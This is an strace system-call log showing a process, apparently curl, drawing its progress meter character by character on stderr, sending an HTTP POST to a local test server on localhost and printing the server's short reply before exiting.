[pid 227718] 1674570440.299724 write(2, "a", 1a) = 1
[pid 227718] 1674570440.299746 write(2, "d", 1d) = 1
[pid 227718] 1674570440.299768 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299791 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299813 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299835 write(2, "T", 1T) = 1
[pid 227718] 1674570440.299857 write(2, "o", 1o) = 1
[pid 227718] 1674570440.299879 write(2, "t", 1t) = 1
[pid 227718] 1674570440.299901 write(2, "a", 1a) = 1
[pid 227718] 1674570440.299922 write(2, "l", 1l) = 1
[pid 227718] 1674570440.299944 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299966 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.299988 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.300014 write(2, "S", 1S) = 1
[pid 227718] 1674570440.300036 write(2, "p", 1p) = 1
[pid 227718] 1674570440.300058 write(2, "e", 1e) = 1
[pid 227718] 1674570440.300080 write(2, "n", 1n) = 1
[pid 227718] 1674570440.300102 write(2, "t", 1t) = 1
[pid 227718] 1674570440.300124 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.300146 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.300168 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.300190 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.300212 write(2, "L", 1L) = 1
[pid 227718] 1674570440.300234 write(2, "e", 1e) = 1
[pid 227718] 1674570440.300256 write(2, "f", 1f) = 1
[pid 227718] 1674570440.300278 write(2, "t", 1t) = 1
[pid 227718] 1674570440.300300 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.300322 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.300345 write(2, "S", 1S) = 1
[pid 227718] 1674570440.300367 write(2, "p", 1p) = 1
[pid 227718] 1674570440.300389 write(2, "e", 1e) = 1
[pid 227718] 1674570440.300411 write(2, "e", 1e) = 1
[pid 227718] 1674570440.300433 write(2, "d", 1d) = 1
[pid 227718] 1674570440.300455 write(2, "\n", 1
) = 1
[pid 227718] 1674570440.300480 write(2, "\r", 1) = 1
[pid 227718] 1674570440.300503 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.300524 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.300546 write(2, "0", 10) = 1
[pid 227718] 1674570440.300568 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.300590 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.300612 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.300634 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.300656 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.300678 write(2, "0", 10) = 1
[pid 227718] 1674570440.300700 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.300722 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.300744 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.300766 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.300787 write(2, "0", 10) = 1
[pid 227718] 1674570440.300809 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.300832 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.300880 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.300902 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.300924 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.300946 write(2, "0", 10) = 1
[pid 227718] 1674570440.300968 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.300990 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.301012 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.301034 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.301056 write(2, "0", 10) = 1
[pid 227718] 1674570440.301078 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.301100 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.301122 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.301144 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.301166 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.301188 write(2, "0", 10) = 1
[pid 227718] 1674570440.301210 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.301232 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.301254 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.301275 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.301297 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.301320 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.301341 write(2, "0", 10) = 1
[pid 227718] 1674570440.301364 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.301386 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.301408 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.301430 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.301452 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.301474 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.301496 write(2, "0", 10) = 1
[pid 227718] 1674570440.301518 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.301541 write(2, "-", 1-) = 1
[pid 227718] 1674570440.301563 write(2, "-", 1-) = 1
[pid 227718] 1674570440.301584 write(2, ":", 1:) = 1
[pid 227718] 1674570440.301606 write(2, "-", 1-) = 1
[pid 227718] 1674570440.301628 write(2, "-", 1-) = 1
[pid 227718] 1674570440.301650 write(2, ":", 1:) = 1
[pid 227718] 1674570440.301672 write(2, "-", 1-) = 1
[pid 227718] 1674570440.301694 write(2, "-", 1-) = 1
[pid 227718] 1674570440.301716 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.301740 write(2, "-", 1-) = 1
[pid 227718] 1674570440.301762 write(2, "-", 1-) = 1
[pid 227718] 1674570440.301785 write(2, ":", 1:) = 1
[pid 227718] 1674570440.301807 write(2, "-", 1-) = 1
[pid 227718] 1674570440.301829 write(2, "-", 1-) = 1
[pid 227718] 1674570440.301854 write(2, ":", 1:) = 1
[pid 227718] 1674570440.301883 write(2, "-", 1-) = 1
[pid 227718] 1674570440.301912 write(2, "-", 1-) = 1
[pid 227718] 1674570440.301935 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.301960 write(2, "-", 1-) = 1
[pid 227718] 1674570440.301987 write(2, "-", 1-) = 1
[pid 227718] 1674570440.302014 write(2, ":", 1:) = 1
[pid 227718] 1674570440.302041 write(2, "-", 1-) = 1
[pid 227718] 1674570440.302068 write(2, "-", 1-) = 1
[pid 227718] 1674570440.302094 write(2, ":", 1:) = 1
[pid 227718] 1674570440.302121 write(2, "-", 1-) = 1
[pid 227718] 1674570440.302148 write(2, "-", 1-) = 1
[pid 227718] 1674570440.302175 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.302201 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.302229 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.302258 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.302290 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.302313 write(2, "0", 10) = 1
[pid 227718] 1674570440.302385 sendto(5, "POST / HTTP/1.1\r\nHost: localhost"..., 3078, MSG_NOSIGNAL, NULL, 0) = 3078
[pid 227718] 1674570440.302709 recvfrom(5, "HTTP/1.0 200 OK\r\nServer: BaseHTT"..., 102400, 0, NULL, NULL) = 92
[pid 227718] 1674570440.302805 recvfrom(5, "Response to POST request\n", 102400, 0, NULL, NULL) = 25
[pid 227718] 1674570440.302895 recvfrom(5, "", 102400, 0, NULL, NULL) = 0
[pid 227718] 1674570440.302923 write(2, "\r", 1) = 1
[pid 227718] 1674570440.302950 write(2, "1", 11) = 1
[pid 227718] 1674570440.302974 write(2, "0", 10) = 1
[pid 227718] 1674570440.302999 write(2, "0", 10) = 1
[pid 227718] 1674570440.303023 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.303046 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.303071 write(2, "2", 12) = 1
[pid 227718] 1674570440.303094 write(2, "9", 19) = 1
[pid 227718] 1674570440.303118 write(2, "5", 15) = 1
[pid 227718] 1674570440.303142 write(2, "3", 13) = 1
[pid 227718] 1674570440.303166 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.303189 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.303213 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.303237 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.303261 write(2, "0", 10) = 1
[pid 227718] 1674570440.303285 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.303309 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.303332 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.303356 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.303380 write(2, "2", 12) = 1
[pid 227718] 1674570440.303404 write(2, "5", 15) = 1
[pid 227718] 1674570440.303427 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.303451 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.303476 write(2, "1", 11) = 1
[pid 227718] 1674570440.303500 write(2, "0", 10) = 1
[pid 227718] 1674570440.303523 write(2, "0", 10) = 1
[pid 227718] 1674570440.303547 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.303571 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.303595 write(2, "2", 12) = 1
[pid 227718] 1674570440.303618 write(2, "9", 19) = 1
[pid 227718] 1674570440.303642 write(2, "2", 12) = 1
[pid 227718] 1674570440.303666 write(2, "8", 18) = 1
[pid 227718] 1674570440.303690 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.303714 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.303737 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.303761 write(2, "3", 13) = 1
[pid 227718] 1674570440.303785 write(2, "9", 19) = 1
[pid 227718] 1674570440.303809 write(2, "2", 12) = 1
[pid 227718] 1674570440.303832 write(2, "5", 15) = 1
[pid 227718] 1674570440.303856 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.303880 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.303904 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.303928 write(2, "4", 14) = 1
[pid 227718] 1674570440.303952 write(2, "4", 14) = 1
[pid 227718] 1674570440.303975 write(2, "8", 18) = 1
[pid 227718] 1674570440.303999 write(2, "k", 1k) = 1
[pid 227718] 1674570440.304023 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.304051 write(2, "-", 1-) = 1
[pid 227718] 1674570440.304076 write(2, "-", 1-) = 1
[pid 227718] 1674570440.304099 write(2, ":", 1:) = 1
[pid 227718] 1674570440.304123 write(2, "-", 1-) = 1
[pid 227718] 1674570440.304147 write(2, "-", 1-) = 1
[pid 227718] 1674570440.304171 write(2, ":", 1:) = 1
[pid 227718] 1674570440.304195 write(2, "-", 1-) = 1
[pid 227718] 1674570440.304219 write(2, "-", 1-) = 1
[pid 227718] 1674570440.304243 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.304267 write(2, "-", 1-) = 1
[pid 227718] 1674570440.304291 write(2, "-", 1-) = 1
[pid 227718] 1674570440.304315 write(2, ":", 1:) = 1
[pid 227718] 1674570440.304338 write(2, "-", 1-) = 1
[pid 227718] 1674570440.304362 write(2, "-", 1-) = 1
[pid 227718] 1674570440.304386 write(2, ":", 1:) = 1
[pid 227718] 1674570440.304410 write(2, "-", 1-) = 1
[pid 227718] 1674570440.304434 write(2, "-", 1-) = 1
[pid 227718] 1674570440.304457 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.304481 write(2, "-", 1-) = 1
[pid 227718] 1674570440.304505 write(2, "-", 1-) = 1
[pid 227718] 1674570440.304529 write(2, ":", 1:) = 1
[pid 227718] 1674570440.304553 write(2, "-", 1-) = 1
[pid 227718] 1674570440.304577 write(2, "-", 1-) = 1
[pid 227718] 1674570440.304601 write(2, ":", 1:) = 1
[pid 227718] 1674570440.304625 write(2, "-", 1-) = 1
[pid 227718] 1674570440.304648 write(2, "-", 1-) = 1
[pid 227718] 1674570440.304672 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.304696 write(2, " ", 1 ) = 1
[pid 227718] 1674570440.304719 write(2, "4", 14) = 1
[pid 227718] 1674570440.304743 write(2, "8", 18) = 1
[pid 227718] 1674570440.304767 write(2, "0", 10) = 1
[pid 227718] 1674570440.304790 write(2, "k", 1k) = 1
[pid 227718] 1674570440.304815 write(2, "\n", 1
) = 1
[pid 227718] 1674570440.304842 close(5) = 0
[pid 227718] 1674570440.304898 write(1, "Response to POST request\n", 25Response to POST request
) = 25
[pid 227718] 1674570440.304967 close(3) = 0
[pid 227718] 1674570440.304989 close(4) = 0
[pid 227718] 1674570440.305509 +++ exited with 0 +++
1674570440.305527 <... wait4 resumed>[{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 227718
1674570440.305544 --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=227718, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
1674570440.305571 wait4(-1, 0x7ffdfdf6918c, WNOHANG, NULL) = -1 ECHILD (No child processes)
1674570440.305598 read(10, "", 8192)    = 0
1674570440.305671 +++ exited with 0 +++
